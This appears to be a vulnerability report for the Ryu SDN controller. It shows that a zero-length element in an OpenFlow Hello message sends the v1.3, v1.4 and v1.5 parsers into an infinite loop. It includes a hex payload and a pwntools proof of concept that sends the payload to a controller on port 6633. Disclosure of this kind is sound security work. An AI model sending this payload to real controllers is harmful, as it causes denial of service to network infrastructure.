in /ryu/ofproto/ofproto_v1_3_parser.py about line=139
class OFPHello(MsgBase):
...
@classmethod
def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
msg = super(OFPHello, cls).parser(datapath, version, msg_type,
msg_len, xid, buf)
offset = ofproto.OFP_HELLO_HEADER_SIZE
elems = []
while offset < msg.msg_len:
type_, length = struct.unpack_from(
ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)
...
offset += length
msg.elements = elems
return msg
If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop.
payload:
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)
poc:
from pwn import *
p=remote("0.0.0.0",6633)
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)p.send(payload)
p.send(payload)
p.interactive()
The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.
This problem also occurs with the following code:
/ryu/ofproto/ofproto_v1_3_parser.py about line=139
/ryu/ofproto/ofproto_v1_4_parser.py about line=103
/ryu/ofproto/ofproto_v1_5_parser.py about line=104